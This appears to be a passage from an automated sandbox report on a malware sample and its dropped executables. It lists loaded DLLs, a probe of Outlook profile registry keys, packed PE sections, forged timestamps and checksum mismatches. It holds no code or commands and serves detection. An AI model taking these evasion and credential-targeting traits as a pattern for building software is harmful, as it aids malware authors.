                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: profapi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: kernel.appcore.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: winhttp.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: mswsock.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: iphlpapi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: winnsi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: urlmon.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: srvcli.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: netutils.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: dnsapi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: rasadhlp.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: fwpuclnt.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: schannel.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: mskeyprotect.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: msasn1.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: dpapi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: cryptsp.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: rsaenh.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: cryptbase.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: gpapi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: ncryptsslp.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: ntmarta.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: uxtheme.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mscoree.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: kernel.appcore.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: version.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: uxtheme.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: cryptsp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: rsaenh.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: cryptbase.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dwrite.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: msvcp140_clr0400.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.storage.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: wldp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: profapi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.applicationmodel.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: twinapi.appcore.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: wintypes.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.globalization.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: bcp47langs.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: bcp47mrm.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dwmapi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: d3d9.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: d3d10warp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: urlmon.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: iertutil.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: srvcli.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: netutils.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windowscodecs.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: msasn1.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: msisip.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: wshext.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: appxsip.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: opcservices.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: esdsip.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ncrypt.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ntasn1.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ncrypt.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ntasn1.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ncryptprov.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: wtsapi32.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: winsta.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: powrprof.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: umpdc.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dataexchange.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: d3d11.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dcomp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dxgi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dxcore.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: textshaping.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.web.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: winmm.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: textinputframework.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: coreuicomponents.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: coremessaging.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ntmarta.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: coremessaging.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: msctfui.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: uiautomationcore.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: propsys.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: d3dcompiler_47.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: wininet.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: sspicli.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: rasapi32.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: rasman.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: rtutils.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mswsock.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: winhttp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: iphlpapi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dhcpcsvc.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: winnsi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: dnsapi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: rasadhlp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: fwpuclnt.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: secur32.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: schannel.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: installservice.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: userenv.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mpr.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mskeyprotect.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ncryptsslp.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: gpapi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: slc.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: sppc.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mscms.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: coloradapterclient.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: ieframe.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: netapi32.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: wkscli.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windowscodecsext.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: edputil.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mlang.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: policymanager.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: msvcp110_win.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: twinui.appcore.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: execmodelproxy.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: mrmcorer.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.staterepositorycore.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windows.ui.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: windowmanagementapi.dll
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeSection loaded: inputhost.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                              Source: file.exeStatic file information: File size 3272704 > 1048576
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: file.exeStatic PE information: Raw size of scoprlns is bigger than: 0x100000 < 0x2b3000
                              Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdb source: 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003396000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000000.2814391688.0000015C06812000.00000002.00000001.01000000.00000013.sdmp
                              Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdbSHA256\u source: 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003396000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000000.2814391688.0000015C06812000.00000002.00000001.01000000.00000013.sdmp
                              Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: 81d22383f9.exe, 0000000C.00000000.2576935006.0000000000162000.00000002.00000001.01000000.0000000C.sdmp
                              Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: 81d22383f9.exe, 0000000C.00000000.2576935006.0000000000162000.00000002.00000001.01000000.0000000C.sdmp
                              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 6f3b41816f.exe, 00000021.00000002.3345424664.0000000000CB2000.00000040.00000001.01000000.0000001F.sdmp
                              Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: a2870b1ac5.exe, 00000007.00000000.2454581777.000000000120C000.00000002.00000001.01000000.0000000A.sdmp

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.bc0000.0.unpack :EW;.rsrc:W;.idata :W;scoprlns:EW;mrzrmbbr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;scoprlns:EW;mrzrmbbr:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.ea0000.0.unpack :EW;.rsrc:W;.idata :W;scoprlns:EW;mrzrmbbr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;scoprlns:EW;mrzrmbbr:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.ea0000.0.unpack :EW;.rsrc:W;.idata :W;scoprlns:EW;mrzrmbbr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;scoprlns:EW;mrzrmbbr:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeUnpacked PE file: 33.2.6f3b41816f.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W;zrghudyy:EW;fscodnir:EW;.taggant:EW; vs :ER;.rsrc:W;
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeUnpacked PE file: 54.2.6f3b41816f.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W;zrghudyy:EW;fscodnir:EW;.taggant:EW; vs :ER;.rsrc:W;
                              Source: random[1].exe1.6.drStatic PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: c9692f9101.exe.6.drStatic PE information: real checksum: 0x1ea87c should be: 0x1e932b
                              Source: 85746525a0.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                              Source: random[4].exe0.6.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                              Source: random[3].exe1.6.drStatic PE information: real checksum: 0x2a7611 should be: 0x2a46ef
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x243ba
                              Source: random[1].exe2.6.drStatic PE information: real checksum: 0x440267 should be: 0x4439a7
                              Source: ed7d415177.exe.6.drStatic PE information: real checksum: 0x1cf327 should be: 0x1d0c9e
                              Source: e637491e0c.exe.6.drStatic PE information: real checksum: 0x440267 should be: 0x4439a7
                              Source: random[3].exe.6.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                              Source: 81d22383f9.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                              Source: skotes.exe.0.drStatic PE information: real checksum: 0x32b0bc should be: 0x32ee2d
                              Source: random[1].exe0.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                              Source: 92aba5cf15.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                              Source: d0e32932f8.exe.6.drStatic PE information: real checksum: 0x2c8098 should be: 0x2c6d73
                              Source: cd81608004.exe.6.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                              Source: 932bb971c3.exe.6.drStatic PE information: real checksum: 0x440267 should be: 0x4439a7
                              Source: random[2].exe0.6.drStatic PE information: real checksum: 0x1cf327 should be: 0x1d0c9e
                              Source: random[1].exe1.6.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                              Source: 796ecf2647.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                              Source: random[3].exe0.6.drStatic PE information: real checksum: 0x454b48 should be: 0x45d9bf
                              Source: random[5].exe.6.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                              Source: random[4].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x7aa07
                              Source: fbaaecbd82.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                              Source: 6f3b41816f.exe.6.drStatic PE information: real checksum: 0x2a7611 should be: 0x2a46ef
                              Source: random[2].exe1.6.drStatic PE information: real checksum: 0x2c8098 should be: 0x2c6d73
                              Source: fb22de53cd93474896e72899203b572f.exe.12.drStatic PE information: real checksum: 0x10c5c5 should be: 0x10b49f
                              Source: 74b92d58dc.exe.6.drStatic PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                              Source: file.exeStatic PE information: real checksum: 0x32b0bc should be: 0x32ee2d
                              Source: 6cc6a39605.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x7aa07
                              Source: e577d0589a.exe.6.drStatic PE information: real checksum: 0x454b48 should be: 0x45d9bf
                              Source: 178ba86573.exe.6.drStatic PE information: real checksum: 0x1ea87c should be: 0x1e932b
                              Source: random[2].exe.6.drStatic PE information: real checksum: 0x1ea87c should be: 0x1e932b
                              Source: file.exeStatic PE information: section name:
                              Source: file.exeStatic PE information: section name: .idata
                              Source: file.exeStatic PE information: section name: scoprlns
                              Source: file.exeStatic PE information: section name: mrzrmbbr
                              Source: file.exeStatic PE information: section name: .taggant
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name: scoprlns
                              Source: skotes.exe.0.drStatic PE information: section name: mrzrmbbr
                              Source: skotes.exe.0.drStatic PE information: section name: .taggant
                              Source: random[3].exe.6.drStatic PE information: section name:
                              Source: random[3].exe.6.drStatic PE information: section name: .idata
                              Source: random[3].exe.6.drStatic PE information: section name:
                              Source: random[3].exe.6.drStatic PE information: section name: wekcazbo
                              Source: random[3].exe.6.drStatic PE information: section name: ttllozcv
                              Source: random[3].exe.6.drStatic PE information: section name: .taggant
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name:
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: .idata
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name:
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: wekcazbo
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: ttllozcv
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: .taggant
                              Source: random[1].exe.6.drStatic PE information: section name: .fptable
                              Source: a2870b1ac5.exe.6.drStatic PE information: section name: .fptable
                              Source: random[1].exe2.6.drStatic PE information: section name:
                              Source: random[1].exe2.6.drStatic PE information: section name: .idata
                              Source: random[1].exe2.6.drStatic PE information: section name:
                              Source: random[1].exe2.6.drStatic PE information: section name: hvytnhuk
                              Source: random[1].exe2.6.drStatic PE information: section name: duidxfgh
                              Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                              Source: 932bb971c3.exe.6.drStatic PE information: section name:
                              Source: 932bb971c3.exe.6.drStatic PE information: section name: .idata
                              Source: 932bb971c3.exe.6.drStatic PE information: section name:
                              Source: 932bb971c3.exe.6.drStatic PE information: section name: hvytnhuk
                              Source: 932bb971c3.exe.6.drStatic PE information: section name: duidxfgh
                              Source: 932bb971c3.exe.6.drStatic PE information: section name: .taggant
                              Source: random[2].exe.6.drStatic PE information: section name:
                              Source: random[2].exe.6.drStatic PE information: section name: .idata
                              Source: random[2].exe.6.drStatic PE information: section name:
                              Source: random[2].exe.6.drStatic PE information: section name: uqowvfqu
                              Source: random[2].exe.6.drStatic PE information: section name: prbaxlvy
                              Source: random[2].exe.6.drStatic PE information: section name: .taggant
                              Source: c9692f9101.exe.6.drStatic PE information: section name:
                              Source: c9692f9101.exe.6.drStatic PE information: section name: .idata
                              Source: c9692f9101.exe.6.drStatic PE information: section name:
                              Source: c9692f9101.exe.6.drStatic PE information: section name: uqowvfqu
                              Source: c9692f9101.exe.6.drStatic PE information: section name: prbaxlvy
                              Source: c9692f9101.exe.6.drStatic PE information: section name: .taggant
                              Source: random[3].exe0.6.drStatic PE information: section name:
                              Source: random[3].exe0.6.drStatic PE information: section name: .idata
                              Source: random[3].exe0.6.drStatic PE information: section name:
                              Source: random[3].exe0.6.drStatic PE information: section name: agnlrrtx
                              Source: random[3].exe0.6.drStatic PE information: section name: dgeihioi
                              Source: random[3].exe0.6.drStatic PE information: section name: .taggant
                              Source: e577d0589a.exe.6.drStatic PE information: section name:
                              Source: e577d0589a.exe.6.drStatic PE information: section name: .idata
                              Source: e577d0589a.exe.6.drStatic PE information: section name:
                              Source: e577d0589a.exe.6.drStatic PE information: section name: agnlrrtx
                              Source: e577d0589a.exe.6.drStatic PE information: section name: dgeihioi
                              Source: e577d0589a.exe.6.drStatic PE information: section name: .taggant
                              Source: random[2].exe0.6.drStatic PE information: section name:
                              Source: random[2].exe0.6.drStatic PE information: section name: .idata
                              Source: random[2].exe0.6.drStatic PE information: section name:
                              Source: random[2].exe0.6.drStatic PE information: section name: lukocbxy
                              Source: random[2].exe0.6.drStatic PE information: section name: egyjeepi
                              Source: random[2].exe0.6.drStatic PE information: section name: .taggant
                              Source: ed7d415177.exe.6.drStatic PE information: section name:
                              Source: ed7d415177.exe.6.drStatic PE information: section name: .idata
                              Source: ed7d415177.exe.6.drStatic PE information: section name:
                              Source: ed7d415177.exe.6.drStatic PE information: section name: lukocbxy
                              Source: ed7d415177.exe.6.drStatic PE information: section name: egyjeepi
                              Source: ed7d415177.exe.6.drStatic PE information: section name: .taggant
                              Source: random[2].exe1.6.drStatic PE information: section name:
                              Source: random[2].exe1.6.drStatic PE information: section name: .idata
                              Source: random[2].exe1.6.drStatic PE information: section name: hvxywfyw
                              Source: random[2].exe1.6.drStatic PE information: section name: megudfof
